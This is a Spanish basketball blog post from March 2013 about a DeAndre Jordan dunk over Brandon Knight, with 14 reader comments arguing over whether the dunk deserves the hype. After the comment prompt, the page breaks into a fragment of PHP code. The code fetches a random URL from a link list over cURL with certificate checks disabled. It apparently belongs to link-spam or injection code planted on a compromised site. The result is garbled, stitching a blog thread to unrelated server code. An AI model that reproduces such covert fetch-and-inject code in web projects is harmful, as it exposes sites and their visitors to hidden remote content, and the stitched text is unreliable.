DeAndre Jordan desintengra a Brandon Knight

11 de March de 2013 por MagicJohnson32

A estas horas, un equipo especializado en búsqueda y recuperación todavía trabaja en el Staples Center. Apenas se han encontrado unos pedacitos de Brandon Knight tras lo ocurrido anoche:

Comenta

14 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Dios santo… da hasta pena por Knight.

      Citar

  2. rumbero dice:
    #2

    Que destrozo al pobre Knight. Y Griffin más emocionado que los 4 chavalines jajaja
    Candidato a mate del año junto con el de Barnes a Pek

      Citar

  3. Ruxixón dice:
    #3

    Pobre Brandon Knight,esta temporada el pobre tiene la etiqueta de “tio al que le mataron en su cara” y el “tio que se atrevió a vacclar a Irving y quedó por los suelos”

      Citar

  4. Jose Luis dice:
    #4

    Yo es que a este mate no le veo nada de mérito… Knight está en el aire, ni siquiera en apoyo que podría hacer algo de fuerza… y comparar la altura y kilos de DeAndre con los de Knight… pues que queréis que os diga. Para mí es un mate más, no comprendo por qué se le está dando tanto bombo. El de Harrison Barnes me parece muchísimo más bestia.

      Citar

  5. Txusma dice:
    #5

    Eso es estar en el sitio equivocado en el momento equivocado.

      Citar

  6. Denise dice:
    #6

    El mate en si es una mierda, una bestia fisica de 2’15 que machaca en la cara a un persoanje de 1’85 que no se le ocurre otra mejor idea que ponerse en medio a intentar taponarle. Lo dicho, no tiene ningun merito para Jordan el haberle machacado en la cara a un tio 30 cms mas bajo que él; lo que pasa es que por el modo en el que cae Knight lo hace a la vista muy espectacular y …humillante. Pero mérito cero para el de Clippers.

    Prefiero la serie de mates de Kobe a Humphries, Josh Smith, el de Toronto el otro día, etc..

      Citar

  7. Jose Luis dice:
    #7

    Sabes también qué pasa? Que son los Clippers, que de cualquier cosa hacen WOOOOOOW

    Si llegan a ser los Celtics o los Spurs, no pasa nada de eso.

      Citar

  8. Viva_Dirk dice:
    #8

    No estoy deacuerdo, el mate tiene una gran plasticidad, en la camara desde atrás se ve como ataca el aro con una sola mano, de cara a la canasta.

    Y luego claro, Knight no se donde coño va, y se lleva lo que se lleva.

      Citar

  9. MagicJohnson32 dice:
    #9

    Pero es que no se trata del mérito de la acción, no es un concurso de dificultad. Se trata de que es una jugada espectacular y se trata de plasticidad, como dice Viva.

      Citar

  10. Jose Luis dice:
    #10

    Yo es que no veo el espectáculo por ningún lado. Si esto lo hace no sé… Jeff Green, no se hablaría tanto. O McRoberts. Se e da mucho bombo porque son los Clippers que cada mate hacen una fiesta, como si fuera una victoria en PO.

      Citar

  11. Denise dice:
    #11

    A ver, como jugada espectacular, highlights y para ponerla en un poster está muy bien, lo unico que digo es que no creo que sea para tanto ya que la victima es un base. Si esto DeAndre Jordan se lo hace a un pivot, me quitó el sombrero, pero el mate en sí es igual que cualquiera de los que Jordan hace otro día normal y corriente, lo no habitual de la situación es que un idiota intente parar a semejante tren y se caiga de espaldas.

    El mate lo veo bastante similar a este, con la diferencia de que no hay ningun suicida que se cruce por medio

      Citar

  12. MagicJohnson32 dice:
    #12

    Ésa es la pena de la jugada, que en lugar de Knight no estuviese Monroe ahí, porque lo habría tirado de espaldas igualmente.

      Citar

  13. rumbero dice:
    #13

    Jose Luis:
    Yo es que no veo el espectáculo por ningún lado. Si esto lo hace no sé… Jeff Green, no se hablaría tanto. O McRoberts. Se e da mucho bombo porque son los Clippers que cada mate hacen una fiesta, como si fuera una victoria en PO.

    Eso es verdad, son muy cansinos Jordan & cia cada vez que hacen una de estas. Recuerdo el año pasado en PO un mate de Griffin sobre Duncan y como lo celebraban los amigos (palmaban 2-0 creo ya en la serie) Y en el último cuarto Tim le pega un gorro de la leche y muchos nos quedamos con las ganas de un bailecito o algo por el estilo pero nada, ni una sonrisa.

    Dicho esto, a mi me parece un señor mate. La pilla bien lejos y la ejecución es perfecta con un tio de por medio, de 80 kilos y no 120 si, pero lo destroza literalmente

      Citar

  14. Denise dice:
    #14

    El mate de McGee la pasada madrugada ante un grandullón (Haddadi, puede ser??) me mola más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>